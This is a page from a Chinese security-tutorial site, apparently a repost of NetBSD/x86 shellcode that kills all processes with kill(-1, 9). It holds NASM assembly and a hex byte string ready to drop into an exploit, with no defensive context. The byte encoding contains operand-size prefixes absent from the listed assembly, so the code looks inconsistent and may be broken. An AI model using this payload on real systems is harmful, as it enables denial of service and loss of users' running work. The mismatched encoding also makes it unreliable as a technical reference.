当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > 杀掉进程的shellcode(netbsd/x86)

杀毒防毒
大蜘蛛杀毒软件是如何扫描系统病毒
完全卸载大蜘蛛杀毒软件的操作方法
如何安装Dr.Web(大蜘蛛杀毒软件)
俄罗斯国防部颁发给Dr.Web大蜘蛛杀毒软件的证书
大蜘蛛杀毒软件隔离区路径设置技巧
大蜘蛛杀毒软件无法启动怎么办?
ESET NOD32防病毒软件取消收发邮件扫描功能
大蜘蛛杀毒软件扫描系统病毒三种方式
Dr.Web无法启动,我们应该怎么办呢?
虚拟机下恢复杀毒软件隔离区的文件
诺顿网络安全特警软件防护功能设置技巧
Kernel32.exe特洛伊木马清除一例
ESET NOD32安全套装非常强大的移动磁盘防护功能
国外媒体:Avira(小红伞)发现Win7漏洞
2009年度中国互联网电脑病毒疫情报告
金山网盾的核心技术:如何实现成功拦截挂马网页
免费PK收费:免费版360杀毒非未逊色
ESET NOD32软件防U盘病毒的设置技巧
卡巴斯基发布2010年网络威胁6项预测
德国小红伞系列防病毒软件Avira V10 Beta

杀毒防毒 中的 杀掉进程的shellcode(netbsd/x86)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 65 ::
收藏到网摘: n/a

  /*

  netbsd/x86 kill all processes shellcode

  author Teo Manojlovic

  contact [email protected]

  this shellcode is using syscall number 37 or 0x25

  37 STD { int sys_kill(int pid, int signum); }

  here is assembler code using intel syntaxe and NASM

  --------------begin-----------

  section .note.netbsd.ident

  dd0x07,0x04,0x01

  db"NetBSD",0x00,0x00

  dd200000000

  section .data

  section .text

  global _start

  _start:

  xor eax, eax

  push 0x09

  mov eax, -1

  push eax

  xor eax,eax

  mov al, 37

  push eax

  int 0x80

  -------------------------end------------

  if we dissasemble this code wi will get shellcode

  "\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"

  */